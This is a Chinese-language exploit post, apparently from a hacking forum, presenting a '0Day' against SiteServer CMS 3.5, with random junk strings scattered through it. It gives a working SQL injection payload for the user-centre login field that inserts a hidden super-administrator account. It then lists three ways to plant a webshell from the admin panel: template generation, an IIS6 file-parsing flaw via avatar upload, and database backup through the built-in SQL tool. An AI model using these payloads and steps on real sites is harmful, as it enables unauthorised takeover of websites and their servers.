SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

# K" a# U) C- m! i" h& S8 w2 astieserver官网:www.siteserver.cn



  {# u' }; b* L, Y5 u1 j* ^% ^+ {EXP:
& a" Y. m. ?8 z1 H+ m! B/ F
1 q0 p; i* M+ P1 g' k* {+ `8 t直接访问UserCenter/login.aspx

* I% l+ t8 u8 }4 m4 {# y

用户名处输入：
0 C3 T& h8 C' ^
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--


/ `' m3 j( N5 s& B+ L
8 x9 `2 H7 [9 t% ?' U密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

* J9 h' x! i6 D$ s" q
" [! [1 v% E! m: T3 Q0 ?. d
之后再访问后台SiteServer/login.aspx用插入的用户登陆

( a: q; w  }/ ?, N

后台拿webshell的三种方法：

0 ~) E3 v6 l6 }5 A' G一、
* X5 ?9 Q& n9 L/ ^' H
) g6 F4 A9 G5 \! ?: y% b站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、
5 V5 n6 B3 Z. e% S
; Q4 ?! w6 J1 v$ i8 {7 j成员权限-》添加用户-》用户名为：1.asp
- D6 ?4 w5 d# o0 e* y
http://127.0.0.1/usercenter/

# A0 ]1 A8 F: K2 a7 e用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
% \$ t, a- l7 H; Z! x
6 |# _% U' J0 r+ H, ?（ps：后台添加用户时不会验证是否含有非法字符）

( f; s8 w  L5 y+ b' g5 ~4 j0 y三、
% c8 n6 w5 |3 c. H4 T" H* P
! G2 Q1 V6 R0 W9 o$ N6 s系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
3 A8 Q& j$ p9 O
+ p1 T8 W3 N; v$ m+ f  ^  J系统工具-》数据库工具-》SQL语句查询
7 g8 d2 a7 ?% r. w) Y' P; f2 U这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
; u6 Z5 L  m1 X6 `1 Z
2 [/ t( \" C; C0 W" y2 l' d. D